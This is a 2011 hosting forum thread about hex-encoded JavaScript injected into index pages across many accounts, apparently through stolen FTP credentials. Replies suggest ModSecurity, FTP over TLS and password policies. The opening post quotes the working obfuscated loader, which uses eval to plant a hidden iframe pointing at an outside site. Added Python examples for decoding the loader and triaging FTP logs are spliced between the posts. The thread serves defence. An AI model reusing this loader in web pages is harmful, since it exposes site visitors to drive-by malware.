  1. #1
    Member rajguru's Avatar
    Join Date
    Jan 2008
    Posts
    36

    Code Injection

    Hi,

    We are facing a problem with code injection, only in index pages on our servers. In messages we found uploads and downloads of index pages from one IP for all users. Following is the code that has been injected.
    =============
    <script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>
    =============

    How can we prevent this? Please advise us.
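As an added example (not part of the original post or of cPanel), the snippet above can be decoded statically rather than run: the loader turns a hex string into JavaScript and passes it to eval, so pulling the hex out with a regex and decoding it shows the hidden iframe and its target without executing anything. The block below uses the exact script quoted in the post as its input; the regex names and the loader signature used to find other infected files are assumptions of this example, not something the thread defines.

```python
"""Static decode of the hex-encoded JavaScript loader quoted in this thread.

Added example: decodes the payload without eval, extracts the iframe target as an
indicator for blocklisting, and offers a signature for finding the same loader shape
in other files. Nothing here contacts the decoded host.
"""
import re
from urllib.parse import urlparse

# The injected <script> exactly as quoted in post #1 (the poster's sample, not constructed).
INJECTED_SCRIPT = (
    '<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22'
    '687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d3637356561'
    '6665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f7264'
    '65723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)'
    't+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>'
)

# Assumed patterns for this example: the hex blob assigned to `arr`, an iframe src attribute,
# and the loader shape "fromCharCode(parseInt(...)) ... ; eval(" that this family uses.
HEX_ARRAY = re.compile(r'var\s+arr\s*=\s*"([0-9a-fA-F]+)"')
IFRAME_SRC = re.compile(r'<iframe[^>]*\ssrc="([^"]+)"', re.IGNORECASE)
LOADER_SIGNATURE = re.compile(r'String\.fromCharCode\(parseInt\([^;]*;\s*eval\(')


def decode_hex_payload(script):
    """Return the JavaScript the loader would have passed to eval, as text."""
    match = HEX_ARRAY.search(script)
    if match is None:
        raise ValueError("no hex array found in script")
    hexstr = match.group(1)
    if len(hexstr) % 2:
        raise ValueError("hex payload has odd length")
    # latin-1 maps every byte to a character, so a non-ASCII payload still decodes for review.
    return bytes.fromhex(hexstr).decode("latin-1")


def extract_iframe_targets(decoded_js):
    """List every iframe src URL written by the decoded payload."""
    return IFRAME_SRC.findall(decoded_js)


def looks_like_hex_eval_loader(text):
    """True when a file contains the hex-array-plus-eval loader shape (for scanning other index files)."""
    return bool(HEX_ARRAY.search(text) and LOADER_SIGNATURE.search(text))


def triage(script):
    """Decode one injected script and summarise its indicators."""
    decoded = decode_hex_payload(script)
    targets = extract_iframe_targets(decoded)
    hosts = sorted({urlparse(u).hostname for u in targets if urlparse(u).hostname})
    return {"decoded": decoded, "iframe_src": targets, "hosts": hosts}


if __name__ == "__main__":
    result = triage(INJECTED_SCRIPT)
    print("decoded :", result["decoded"])
    print("iframes :", result["iframe_src"])
    print("hosts   :", result["hosts"])
```

Running the block prints the decoded `document.write('<iframe src="…" width="1" height="1" frameborder="0"></iframe>')` call, which is why the injection is invisible on the rendered page: a 1x1 frame pulling a remote page into every visitor's browser. The host it decodes to is a historical indicator from a 2011 thread and belongs in a blocklist or scan rule, not in a browser. `looks_like_hex_eval_loader` can be run over the text of every `index.php` and `index.html` under `/home/*/public_html` to find files that carry the same loader with a different hex blob.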

  2. #2
    cPanel Staff cPanelTristan's Avatar
    Join Date
    Oct 2010
    Location
    somewhere over the rainbow
    Posts
    6,305
    cPanel/Enkompass Access Level

    Root Administrator

    Re: Code Injection

    What script was running that had the code injection or how was it accomplished precisely?

    Do you have ModSecurity running on the machine? It might not have prevented the issue, but it could be useful to run on the machine regardless.

    Next, do you have register_globals set to Off for the global php.ini file and, if you are using suPHP, are you preventing users from creating their own php.ini file?
    cPResources: Support Options | More Support Options | Forums Search | cPanel.net Site Search | Mailing Lists(Alt) | Docs
    -- Tristan, Forums Technical Analyst, cPanel Tech Support

    Submit a ticket | Check an existing ticket

  3. #3
    Member This forum account has been confirmed by cPanel staff to represent a vendor.
    Join Date
    Apr 2008
    Posts
    80

    Re: Code Injection

    Are you sure this was via a web injection? The code may have also been added to the file via FTP, or shell (which is usually the case if a file is modified). Do you see anything in your logs that would tell you this is web based, and not uploaded code?
    Michael Shinn
    Prometheus Global - home of gotroot.com and Atomicorp and
    Secure Your Server Now with Atomic Secured Linux!

  4. #4
    Member rajguru's Avatar
    Join Date
    Jan 2008
    Posts
    36

    Re: Code Injection

    Hi,

    Thanks for your help,

    We are using suPHP and ModSecurity, and register_globals is off.

    We found the following logs for every user, with the same IP downloading and uploading index pages continuously.

    xx.xx.xx.xx >> is the hacker's IP
    ======================
    Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-blog-header.php uploaded (664 bytes, 17.76KB/sec)
    Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/index.php downloaded (32 bytes, 165.29KB/sec)
    Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/index.php uploaded (420 bytes, 11.62KB/sec)
    Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//tmp/webalizer/index.html downloaded (4433 bytes, 220.11KB/sec)
    Jul 16 23:09:48 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//tmp/webalizer/index.html uploaded (4277 bytes, 102.88KB/sec)
    Jul 16 23:09:48 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//tmp/webalizerftp/index.html downloaded (6100 bytes, 190.80KB/sec)
    Jul 16 23:09:50 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/themes/index.php downloaded (32 bytes, 1.27KB/sec)
    Jul 16 23:09:50 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/themes/index.php
    ======================

    We are not sure how this could happen.

    Please advise us.
    Last edited by rajguru; 07-20-2011 at 04:13 AM.
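The pure-ftpd lines above already contain the answer the later replies give: one source IP authenticating as many different accounts and overwriting each account's index files. As an added example (not from the thread or from cPanel), the block below parses lines in that exact format and flags two things a defender would want surfaced automatically: a source IP that uploads into several distinct accounts, and a download immediately followed by an upload of the same path (the overwrite that plants the script). The sample log is constructed, with RFC 5737 documentation addresses and made-up usernames, and copies the thread's line shape including a truncated final line.

```python
"""Triage of pure-ftpd transfer logs for the "one IP writes to many accounts" pattern.

Added example, not from the thread. Parses the syslog-style [NOTICE] transfer lines that
pure-ftpd writes, groups uploads by source IP, and reports download-then-upload overwrites.
"""
import re
from collections import defaultdict

# Transfer line as shown in the thread:
#   Jul 16 23:09:47 vital pure-ftpd: (user@ip) [NOTICE] /path uploaded (664 bytes, 17.76KB/sec)
FTP_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ pure-ftpd: "
    r"\((?P<user>[^@)]+)@(?P<ip>[^)]+)\) \[NOTICE\] (?P<path>\S+) "
    r"(?P<action>uploaded|downloaded) \((?P<size>\d+) bytes"
)

# Constructed sample. Three accounts are touched from 203.0.113.5 in the same few seconds;
# one unrelated upload comes from 198.51.100.20. The last line is cut off like the thread's.
SAMPLE_LOG = """\
Jul 16 23:09:47 vital pure-ftpd: (alice@203.0.113.5) [NOTICE] /home/alice//public_html/wp-content/index.php downloaded (32 bytes, 165.29KB/sec)
Jul 16 23:09:47 vital pure-ftpd: (alice@203.0.113.5) [NOTICE] /home/alice//public_html/wp-content/index.php uploaded (420 bytes, 11.62KB/sec)
Jul 16 23:09:48 vital pure-ftpd: (bob@203.0.113.5) [NOTICE] /home/bob//public_html/index.php downloaded (1150 bytes, 220.11KB/sec)
Jul 16 23:09:48 vital pure-ftpd: (bob@203.0.113.5) [NOTICE] /home/bob//public_html/index.php uploaded (1538 bytes, 102.88KB/sec)
Jul 16 23:09:50 vital pure-ftpd: (carol@203.0.113.5) [NOTICE] /home/carol//public_html/index.html downloaded (6100 bytes, 190.80KB/sec)
Jul 16 23:09:50 vital pure-ftpd: (carol@203.0.113.5) [NOTICE] /home/carol//public_html/index.html uploaded (6488 bytes, 190.80KB/sec)
Jul 16 23:15:02 vital pure-ftpd: (dave@198.51.100.20) [NOTICE] /home/dave//public_html/photos/img01.jpg uploaded (204800 bytes, 950.00KB/sec)
Jul 16 23:09:50 vital pure-ftpd: (carol@203.0.113.5) [NOTICE] /home/carol//public_html/wp-content/themes/index.php
"""


def parse_ftp_log(text):
    """Return one dict per well-formed transfer line; truncated or unrelated lines are skipped."""
    events = []
    for line in text.splitlines():
        m = FTP_LINE.match(line)
        if m is None:
            continue
        ev = m.groupdict()
        ev["size"] = int(ev["size"])
        events.append(ev)
    return events


def find_shared_source_ips(events, min_accounts=3):
    """Map each source IP that uploaded into at least `min_accounts` distinct accounts to those accounts.

    Many hosting customers do not share an FTP client address, so one IP writing into
    several unrelated home directories points at harvested credentials rather than web injection.
    """
    users_by_ip = defaultdict(set)
    for ev in events:
        if ev["action"] == "uploaded":
            users_by_ip[ev["ip"]].add(ev["user"])
    return {ip: sorted(users) for ip, users in users_by_ip.items() if len(users) >= min_accounts}


def find_overwrites(events):
    """Report paths that were downloaded and then re-uploaded by the same user from the same IP.

    The size delta is kept because an injected loader makes the file grow by roughly the
    script's length; a shrink or no change suggests a different kind of edit.
    """
    last_download = {}
    findings = []
    for ev in events:
        key = (ev["user"], ev["ip"], ev["path"])
        if ev["action"] == "downloaded":
            last_download[key] = ev["size"]
        elif key in last_download:
            before = last_download.pop(key)
            findings.append({"user": ev["user"], "ip": ev["ip"], "path": ev["path"],
                             "ts": ev["ts"], "size_before": before, "size_after": ev["size"],
                             "delta": ev["size"] - before})
    return findings


if __name__ == "__main__":
    evs = parse_ftp_log(SAMPLE_LOG)
    for ip, users in find_shared_source_ips(evs).items():
        print(f"{ip} uploaded into {len(users)} accounts: {', '.join(users)}")
    for f in find_overwrites(evs):
        print(f"{f['ts']} {f['user']}@{f['ip']} overwrote {f['path']} ({f['size_before']} -> {f['size_after']} bytes)")
```

On a real server the same functions can be fed `/var/log/messages` (or wherever pure-ftpd logs on the box) with `min_accounts` tuned to the customer base; the IP list from `find_shared_source_ips` is what to block at the firewall and the account list is who needs a forced password reset, which is the remediation the replies below converge on.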

  5. #5
    Member
    Join Date
    Dec 2009
    Posts
    17

    Re: Code Injection

    1) Change the password for that account.
    2) Tell the account owner to scan his computer with antivirus/antimalware/antispyware software.
    3) Scan your PCs too.
    4) Remove the injected code from the account files.

    I believe this is a typical "client" side issue, where the computer is infected via the use of some sort of "cracked" software and the account credentials get stolen.

  6. #6
    Member rajguru's Avatar
    Join Date
    Jan 2008
    Posts
    36

    Re: Code Injection

    Hello Defected,

    Thanks for your help, but this is not for only one account; all our servers are having the same issue with all accounts. So please guide us on how we can prevent this in future.

  7. #7
    cPanel Staff cPanelTristan's Avatar
    Join Date
    Oct 2010
    Location
    somewhere over the rainbow
    Posts
    6,305
    cPanel/Enkompass Access Level

    Root Administrator

    Re: Code Injection

    Are you forcing TLS for FTP connections in the WHM > FTP Server Configuration area for the "TLS Encryption Support" dropdown? I would highly suggest changing it to "Required (Command/Data)" there.

    Next, I would suggest enabling the Configure Security Policies area in WHM to force password strength and password age requirements. This will make all users have to change their passwords and have a strong password.

    For your customers, do you have another login system they use where you are storing their cPanel passwords somewhere? If your users have a login area like a billing system and you are storing passwords in that system, please ensure those passwords are being encrypted.
    -- Tristan, Forums Technical Analyst, cPanel Tech Support
